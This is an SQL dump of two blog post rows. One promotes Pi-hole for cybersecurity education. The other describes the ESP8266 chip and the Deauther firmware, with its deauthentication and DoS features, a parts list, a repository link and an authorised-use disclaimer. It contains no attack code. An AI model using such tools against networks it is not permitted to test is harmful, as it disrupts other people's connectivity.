(128, 'Unlocking the Power of Pi-hole in Cybersecurity Education', 'unlocking-the-power-of-pi-hole-in-cybersecurity-education', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">As the landscape of cybersecurity continues to evolve at a rapid pace, the need for practical, hands-on tools becomes increasingly crucial. One such tool that\'s gaining traction in both home networks and educational settings is <b><strong class=\"font-bold\">Pi-hole</strong></b>, a network-wide ad blocker and a powerful resource for enhancing cybersecurity skills.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">But Pi-hole is much more than an ad blocker—it’s an invaluable educational tool for cybersecurity enthusiasts and professionals alike. This article will explore the capabilities, benefits, and tremendous potential of Pi-hole in cybersecurity education, highlighting how it serves as a bridge between theoretical concepts and real-world applications.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What is Pi-hole?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Pi-hole is an open-source software that acts as a DNS sinkhole, effectively blocking unwanted content at the network level. Unlike browser-based ad blockers, Pi-hole operates across your entire network. By routing DNS requests through Pi-hole, you can block ads, malware, and tracking domains before they even reach your devices.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Features of Pi-hole</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Network-wide Protection</strong></b>: Once configured, all devices on your network are automatically covered. No need to install software on each device.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Customizable Block Lists</strong></b>: Users can choose pre-configured block lists or add their own, making Pi-hole incredibly adaptable to individual needs.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Performance Boost</strong></b>: By blocking unwanted content at the DNS level, network performance is improved, reducing load times and conserving bandwidth.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">User-Friendly Interface</strong></b>: Pi-hole includes an intuitive web dashboard, offering an easy way to monitor and control network activity in real time.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Role of Pi-hole in Cybersecurity Education</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Pi-hole isn’t just a utility for blocking ads—it’s a versatile platform for learning cybersecurity fundamentals. Here’s how Pi-hole can play a significant role in developing hands-on skills in network security.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. <b><strong class=\"font-bold\">Understanding DNS and Network Traffic</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">DNS (Domain Name System) is a crucial backbone of the internet. Using Pi-hole, students gain hands-on experience with DNS requests and filtering.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Explore the Flow of DNS Queries</strong></b>: Learn how DNS requests are processed, and practice identifying and blocking malicious domains.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Visualize Traffic</strong></b>: The Pi-hole dashboard provides real-time data on DNS activity, offering a practical understanding of the data flow in a network.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. <b><strong class=\"font-bold\">Applying Security Concepts in Practice</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Unlike purely theoretical lessons, Pi-hole allows students to actually implement cybersecurity measures.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Network Configuration</strong></b>: Setting up Pi-hole involves configuring network settings, managing DNS servers, and using the Linux command line, all vital skills in cybersecurity.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Blocking Malicious Domains</strong></b>: Understand and apply key security concepts like preventing access to known phishing or malicious websites through DNS filtering.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. <b><strong class=\"font-bold\">Monitoring and Analyzing Network Activity</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Network monitoring is a critical skill for cybersecurity professionals. Pi-hole allows students to develop this skill in a controlled and practical environment.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Threat Detection</strong></b>: Identify potentially harmful domains by monitoring DNS query logs.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Traffic Trends</strong></b>: Analyze data patterns to understand network activity and detect anomalies.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. <b><strong class=\"font-bold\">Enhancing Online Privacy</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Privacy is an essential pillar of cybersecurity. By blocking tracking domains, Pi-hole protects user data and reduces exposure to online threats.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Real-World Applications</strong></b>: Hands-on experience with privacy-enhancing tools gives learners a competitive edge when applying for cybersecurity roles.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Ethical Decision-Making</strong></b>: Explore the role of privacy in cybersecurity and how tools like Pi-hole strengthen user trust.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Getting Started with Pi-hole</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Setting up Pi-hole is straightforward, and it’s accessible for learners of all experience levels.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Installation</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Pi-hole can be installed on several platforms, including Raspberry Pi, Docker, virtual machines, or even cloud environments. Follow the step-by-step guide linked here to get started:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><a class=\"text-indigo-700 underline underline-offset-4\" href=\"https://pi-hole.net/\">Official Installation Guide</a></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><a class=\"text-indigo-700 underline underline-offset-4\" href=\"https://github.com/pi-hole/pi-hole#one-step-automated-install\">GitHub Installation Documentation</a></li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Configuration</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Once installed, you can customize Pi-hole to suit specific needs.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Add Custom Block Lists</strong></b>: Choose from a variety of pre-configured lists or curate your own for enhanced filtering.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Integrate with Other Tools</strong></b>: Connect Pi-hole to additional security tools or a VPN for even greater protection.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Maintenance and Updates</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To ensure Pi-hole operates optimally, regular updates are essential.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Update Block Lists</strong></b>: Keep your block lists current to protect against new threats.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Monitor Performance</strong></b>: Use the web dashboard to monitor usage statistics and make necessary adjustments.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Benefits of Incorporating Pi-hole into Cybersecurity Education</h2>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Hands-On Experience</strong></b>: Pi-hole bridges the gap between theoretical learning and real-world applications, making abstract concepts tangible.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Adaptable for All Skill Levels</strong></b>: From beginners learning about DNS to advanced users exploring network traffic analysis, Pi-hole caters to a wide range of learners.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Critical Thinking Development</strong></b>: Encourages students to think critically about network security, privacy, and ethical considerations.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Choose Pi-hole for Your Educational Needs?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Pi-hole stands out as a multi-functional tool that is not only cost-effective but also open-source, making it accessible for educational institutions and individuals alike.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Community Support</strong></b>: With an active user base and extensive online documentation, help is always at hand.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Scalable</strong></b>: From small practices on Raspberry Pi to enterprise-level configurations, Pi-hole can scale to meet the needs of any user.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Final Thoughts</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">If you’re looking to develop hands-on skills in cybersecurity, Pi-hole is the perfect tool to begin your journey. By bridging the gap between theory and practice, it provides invaluable insights into DNS management, network security, and online privacy. Whether you’re a student learning the basics or a professional seeking to enhance your skills, Pi-hole offers an engaging and practical learning experience.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Are you ready to unlock the potential of Pi-hole? Start your cybersecurity education today by setting up Pi-hole on your network. Remember—the best way to learn is through DOING</p>', '', NULL, NULL, 1, 'draft', '2024-08-01 02:42:37', '2026-01-12 21:41:44', 'Network Security', 'Unlocking the Power of Pi-hole in Cybersecurity Education', '', NULL),
(129, 'ESP8266: A Tiny WiFi Chip Powering Big IoT and Cybersecurity Innovations', 'esp8266-a-tiny-wifi-chip-powering-big-iot-and-cybersecurity-innovations', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The ESP8266, a small yet powerful low-cost chip, has revolutionized IoT (Internet of Things) projects by bringing Wi-Fi capabilities to a wide range of applications. With its ability to connect devices to the internet, process data, and easy programmability, the ESP8266 has become a favorite among developers, tech hobbyists, and cybersecurity enthusiasts. But its potential doesn’t end with IoT; this tiny chip also has exciting applications in the cybersecurity domain.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This article explores the ESP8266’s features, how it’s used in cybersecurity, and a notable project that demonstrates its potential. Whether you’re an IoT hobbyist or curious about ethical hacking tools, this guide will provide the essential details you need.</p>\r\n\r\n\r\n<hr />\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What Makes the ESP8266 a Game-Changer?</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The ESP8266 stands out due to its simplicity, affordability, and versatility. Here\'s a breakdown of its core features:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Wi-Fi Connectivity</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">It allows seamless wireless communication, enabling devices to connect to the internet for remote control, monitoring, and data sharing.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Built-in Processing Power</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With its onboard processing capabilities, the ESP8266 can handle sensor data and perform actions without relying on an external computer.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Beginner-Friendly Programming</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The chip is compatible with popular platforms like the Arduino IDE, making it accessible to newcomers and experienced developers alike.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Its low cost, combined with these features, has made it a staple in IoT projects. But the ESP8266 is not just for IoT—it can also play a role in cybersecurity innovation.</p>\r\n\r\n\r\n<hr />\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Unlocking Cybersecurity Potential with ESP8266</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The ESP8266 wasn’t originally designed for cybersecurity, but its features can creatively address various security challenges. Here are some compelling examples:</p>\r\n\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. <b><strong class=\"font-bold\">Intrusion Detection System (IDS)</strong></b></h4>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The ESP8266 can be programmed to monitor a Wi-Fi network for suspicious activity. Using its capabilities, you can:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Scan for unknown or unauthorized devices.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Identify potential jamming attempts.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Detect deauthentication attacks—when a hacker forces devices to disconnect from the network.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By analyzing network traffic and comparing it against known threat patterns, the ESP8266 can act as an early warning system. While it’s not as powerful as dedicated hardware, it’s a cost-effective tool for basic monitoring.</p>\r\n\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. <b><strong class=\"font-bold\">Honeytrap for Threat Intelligence</strong></b></h4>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The ESP8266 can be set up as a simple \"honeypot,\" a decoy system designed to lure attackers. Posing as a vulnerable device on the network, it:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Collects information about the methods attackers use.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Provides insights into potential threats that can inform future defenses.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This lightweight honeypot approach makes it an excellent learning tool for cybersecurity researchers and those wanting to test network vulnerabilities.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Note:</strong></b> While these ideas utilize the ESP8266 effectively, they should not replace dedicated tools and systems. Think of the ESP8266 as a supplementary option in your security toolkit.</p>\r\n\r\n\r\n<hr />\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Real-World Application in Cybersecurity: The ESP8266 Deauther Project</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">One of the most fascinating uses of the ESP8266 in cybersecurity is the <b><strong class=\"font-bold\">ESP8266 Deauther Project</strong></b>. This open-source firmware leverages the chip’s Wi-Fi capabilities to test network vulnerabilities ethically.</p>\r\n\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Features of the ESP8266 Deauther</h4>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Wi-Fi Scanning</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The ESP8266 can scan for nearby Wi-Fi networks and connected devices, providing insights into the local wireless landscape.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"2\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Deauthentication Attacks</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The software can exploit a known Wi-Fi vulnerability by sending deauthentication packets, which force devices to disconnect from the network. This functionality can be used ethically to identify vulnerable devices.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"3\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Denial-of-Service (DoS) Simulation</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By flooding the network with fake traffic or deauthentication packets, the ESP8266 can mimic a real-world DoS attack, helping organizations test their network’s robustness against such disruptions.</p>\r\n\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Building an ESP8266 Deauther</h4>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To create your own ESP8266 Deauther, you’ll need the following:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Hardware</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">SSD1306 OLED Display</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Three tactile push buttons</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Wemos D1 Mini board (ESP8266-based)</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\"><b><strong class=\"font-bold\">Software</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">You can download the required firmware from <a class=\"text-indigo-700 underline underline-offset-4\" href=\"https://github.com/SpacehuhnTech/esp8266_deauther\">Spacehuhn Tech’s GitHub repository</a>. Simply upload the firmware to your Wemos D1 Mini using the Arduino IDE, and you’re ready to explore its features responsibly.</p>\r\n\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Disclaimer</h4>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The ESP8266 Deauther is strictly for ethical testing and educational purposes. Use it only on your own networks unless explicitly permitted by the network owner. Ensure compliance with local laws and regulations to avoid misuse.</p>\r\n\r\n\r\n<hr />\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] 